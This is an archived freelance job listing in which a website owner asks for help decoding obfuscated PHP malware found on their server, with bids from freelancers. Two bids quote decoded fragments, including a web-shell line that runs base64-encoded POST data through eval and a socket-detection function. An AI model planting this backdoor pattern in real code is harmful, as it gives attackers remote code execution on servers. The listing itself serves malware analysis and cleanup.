Decrypt malware obcusificated php file

$2-8 USD / hour

Terminado

Publicado

hace más de 8 años

$2-8 USD / hour

I have a few files I need decrypted that have been injected on my server and I desire to know the actual php encrypted. See attached crap code. You'll be getting a 5star review for service within 15 minutes if you know which site that can decrypt it that is :D

JavaScript

Linux

PHP

ID del proyecto: 8498530

Información sobre el proyecto

6 propuestas

Proyecto remoto

Activo hace 9 años

¿Buscas ganar dinero?

Dirección de email

Beneficios de presentar ofertas en Freelancer

Fija tu plazo y presupuesto

Cobra por tu trabajo

Describe tu propuesta

Es gratis registrarse y presentar ofertas en los trabajos

Adjudicado a:

@xpoh

Hello! I can help u with this project. What do u want to get as output? Because this scripts generates html page with javascripts. Contact me to discuss details.

$8 USD en 1 día

5,0

(10 comentarios)

3,4

6 freelancers están ofertando un promedio de $21 USD /hora por este trabajo

@dimkazakos

my price is fixed $30! here there are the first lines: <?php if (isset($_POST['nf385ab'])) { eval(base64_decode($_POST['nf385ab'])); } ?> <?php xxxxxxxxxxxxxxxxxxxxx function itwro48($z26, $xyslz28) { if (function_exists('socket_create') && function_exists('socket_connect') && function_exists('socket_read') && function_exists('socket_write')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_SOCKET')); return TRUE; } if (function_exists('fsockopen')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_FSOCKET')); return TRUE; } if (function_exists('stream_socket_client')) { define('SOCKET_TYPE', constant('SOCKET_TYPE_STREAM')); return TRUE; } define('SOCKET_TYPE', constant('SOCKET_TYPE_NO')); return FALSE; } xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Thank you in advance.

$33 USD en 1 día

5,0

(55 comentarios)

5,3

@unitmatrix

Hello, I am sorry to hear your server injection. I will be glad to help you to read the malware code contents as requested. The attached malware file is not actually encrypted or encoded because you can actually see readable php code in it, but in fact it is obfuscated which means that it is written so that it is very hard to understand as you do not see normal variables or PHP function calls because those are hidden (obfuscated). You will not find a general website that will decode/deobfuscate this for you automatically. I have analyzed the code and here is what I can do for you: I can deobfuscate this this manually for you to the extent where you can read actual PHP function calls and actual variables which will make the code look readable as usual so you can read what the hacker intended to execute on your server. However, I can not guarantee that the code will make sense or will be very easy to understand. I almost got it done for you, I just need your confirmation so I can run the final global replacements. Here is a sample of the first few lines of this file I just decoded: if (isset($_POST['nf385ab'])) { eval(base64_decode($_POST['nf385ab')) } And the code will be made tidy with proper indentations. Please let me know if you need any help, Thank you, Alex

$55 USD en 1 día